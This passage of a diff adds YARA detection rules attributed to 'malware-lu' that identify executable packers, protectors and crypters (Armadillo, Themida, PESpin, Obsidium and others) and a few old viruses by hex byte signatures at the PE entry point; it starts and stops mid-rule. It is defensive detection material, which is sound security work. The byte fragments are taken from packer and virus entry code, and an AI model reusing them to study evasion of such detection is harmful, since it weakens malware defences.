+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41 }
+	$a1 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 93 03 00 00 03 C8 74 C4 75 C2 E8 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Reg2Exe222223byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 2F 1E 00 00 A3 C4 35 40 00 E8 2B 1E 00 00 6A 0A 50 6A 00 FF 35 C4 35 40 00 E8 07 00 00 00 50 E8 1B 1E 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 C8 35 40 00 E8 76 16 00 00 83 C4 0C 8B 44 24 04 A3 CC 35 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 EC 1D 00 00 A3 C8 35 40 00 E8 62 1D 00 00 E8 92 1A 00 00 E8 80 16 00 00 E8 13 14 00 00 68 01 00 00 00 68 08 36 40 00 68 00 00 00 00 8B 15 08 36 40 00 E8 71 3F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 3F 00 00 FF 35 48 31 40 00 B8 00 01 00 00 E8 0D 13 00 00 8D 0D EC 35 40 00 5A E8 F2 13 00 00 68 00 01 00 00 FF 35 EC 35 40 00 E8 84 1D 00 00 A3 F4 35 40 00 FF 35 48 31 40 00 FF 35 F4 35 40 00 FF 35 EC 35 40 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtBorlandDelphiMicrosoftVisualC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CICompressv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 04 68 00 10 00 00 FF 35 9C 14 40 00 6A 00 FF 15 38 10 40 00 A3 FC 10 40 00 97 BE 00 20 40 00 E8 71 00 00 00 3B 05 9C 14 40 00 75 61 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 68 94 10 40 00 FF 15 2C 10 40 00 A3 F8 10 40 00 6A 00 68 F4 10 40 00 FF 35 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv27b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 40 85 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 87 DD 8B 85 E6 90 40 00 01 85 33 90 40 00 66 C7 85 30 90 40 00 90 90 01 85 DA 90 40 00 01 85 DE 90 40 00 01 85 E2 90 40 00 BB 7B 11 00 00 03 9D EA 90 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXInlinerv10byGPcH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule PKLITEv114v120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeToolsCOM2EXE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5D 83 ED ?? 8C DA 2E 89 96 ?? ?? 83 C2 ?? 8E DA 8E C2 2E 01 96 ?? ?? 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2545Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F2 FF FF FF 50 68 ?? ?? ?? ?? 68 40 1B 00 00 E8 42 FF FF FF E9 9D FF FF FF 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxARCV4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 5D 81 ED 06 01 81 FC 4F 50 74 0B 8D B6 86 01 BF 00 01 57 A4 EB 11 1E 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo3X5XSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 60 33 C9 75 02 EB 15 EB 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePESHiELD025emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2B 00 00 00 0D 0A 0D 0A 0D 0A 52 65 67 69 73 74 41 72 65 64 20 74 6F 3A 20 4E 4F 4E 2D 43 4F 4D 4D 45 52 43 49 41 4C 21 21 0D 0A 0D 0A 0D 00 58 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov252beta2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? B0 ?? ?? ?? ?? 68 60 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CipherWallSelfExtratorDecryptorConsolev15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 0B 6E 5B 9B 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv029
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? 01 AD 55 39 40 ?? 8D B5 35 39 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV33LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CopyMinderMicrocosmLtd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 25 ?? ?? ?? ?? EF 6A 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Crunchv5BitArts
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 15 03 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 FC 07 00 00 89 85 E8 07 00 00 FF 74 24 2C E8 20 02 00 00 0F 82 94 06 00 00 E8 F3 04 00 00 49 0F 88 88 06 00 00 8B B5 E8 07 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv020
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E8 01 ?? ?? 60 01 AD B3 27 40 ?? 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo500SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E3 40 00 00 E9 16 FE FF FF 6A 0C 68 ?? ?? ?? ?? E8 44 15 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 36 13 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 C7 12 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 48 11 00 00 59 89 7D FC FF 75 08 E8 01 49 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 66 D3 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 AF F9 FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 EE 0F 00 00 59 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtector060SLVICU
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD }
+
+condition:
+		$a0
+}
+	
+	
+rule Kryptonv03
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 0C 24 E9 C0 8D 01 ?? C1 3A 6E CA 5D 7E 79 6D B3 64 5A 71 EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrackStopv101cStefanEsser1997
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 48 BB FF FF B9 EB 27 8B EC CD 21 FA FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Kryptonv05
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 71 44 ?? ?? 2B 85 64 60 ?? ?? EB 43 DF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Kryptonv04
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 61 34 ?? ?? 2B 85 60 37 ?? ?? 83 E8 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PassLock2000v10EngMoonlightSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv029Betav031BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3 }
+
+condition:
+		$a0
+}
+	
+	
+rule AlexProtector10beta2byAlex
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B 44 24 0C EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 83 80 B8 00 00 00 02 33 C0 EB 01 E9 C3 58 83 C4 04 EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 50 64 FF 35 00 00 00 00 64 89 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule MoleBoxv254Teggo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 8B 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 24 61 58 58 FF D0 E8 ?? ?? 00 00 6A 00 FF 15 ?? ?? ?? 00 CC CC CC CC CC CC CC CC CC CC CC CC CC CC }
+
+condition:
+		$a0
+}
+	
+	
+rule InstallShield2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 C4 ?? 53 56 57 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1337ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv03Engcyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 }
+	$a1 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02PEPack099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxVCL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { AC B9 00 80 F2 AE B9 04 00 AC AE 75 ?? E2 FA 89 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VterminalV10XLeiPeng
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 05 ?? ?? ?? ?? 9C 50 C2 04 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEEncrypt10Liwuyue
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D 0F 05 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89 5D EC 8B 41 18 8B C8 49 85 C9 72 5A 41 33 C0 8B D8 C1 E3 02 03 DA 8B 3B 03 3E 81 3F 47 65 74 50 75 40 8B DF 83 C3 04 81 3B 72 6F 63 41 75 33 8B DF 83 C3 08 81 3B 64 64 72 65 75 26 83 C7 0C 66 81 3F 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InstallAnywhere61ZeroGSoftwareInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
+	$a1 = { 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule iLUCRYPTv4018exe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC FA C7 ?? ?? ?? ?? 4C 4C C3 FB BF ?? ?? B8 ?? ?? 2E ?? ?? D1 C8 4F 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02ASProtectAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV22006710WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 }
+	$a1 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Themida10xx18xxnocompressionOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }
+	$a1 = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule StonesPEEncryptorv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 63 3A 40 ?? 2B 95 C2 3A 40 ?? 83 EA 0B 89 95 CB 3A 40 ?? 8D B5 CA 3A 40 ?? 0F B6 36 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyBoxDAnskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 33 C9 51 51 51 51 51 53 33 C0 55 68 84 2C 40 00 64 FF 30 64 89 20 C6 45 FF 00 B8 B8 46 40 00 BA 24 00 00 00 E8 8C F3 FF FF 6A 24 BA B8 46 40 00 8B 0D B0 46 40 00 A1 94 46 40 00 E8 71 FB FF FF 84 C0 0F 84 6E 01 00 00 8B 1D D0 46 40 00 8B C3 83 C0 24 03 05 D8 46 40 00 3B 05 B4 46 40 00 0F 85 51 01 00 00 8D 45 F4 BA B8 46 40 00 B9 10 00 00 00 E8 A2 EC FF FF 8B 45 F4 BA 9C 2C 40 00 E8 F1 ED FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule Mew10execoder10NorthfoxHCC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypt102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DIETv100d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 06 1E 0E 8C C8 01 ?? ?? ?? BA ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorV112SukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 C5 FA 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeASPack212FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
